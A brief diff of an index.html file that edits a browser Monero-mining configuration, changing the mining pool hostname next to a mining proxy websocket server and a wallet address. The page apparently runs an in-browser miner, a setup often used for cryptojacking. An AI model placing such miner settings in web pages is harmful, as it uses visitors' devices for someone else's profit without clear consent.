--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
 
     server = "wss://f.xmrminingproxy.com:8181";
 
-    var pool = "gulf.moneroocean.stream";
+    var pool = "moneroocean.stream";
 
     var walletAddress = "48EonXRqcmsNCdiYCvGnUKWyHddmnqCRGCkKdLiHMKjAEFGzYtFd2bNd6XA8SLxqdzNHcrqPNYe2mFFLypfhNATwVGurBqG";
 
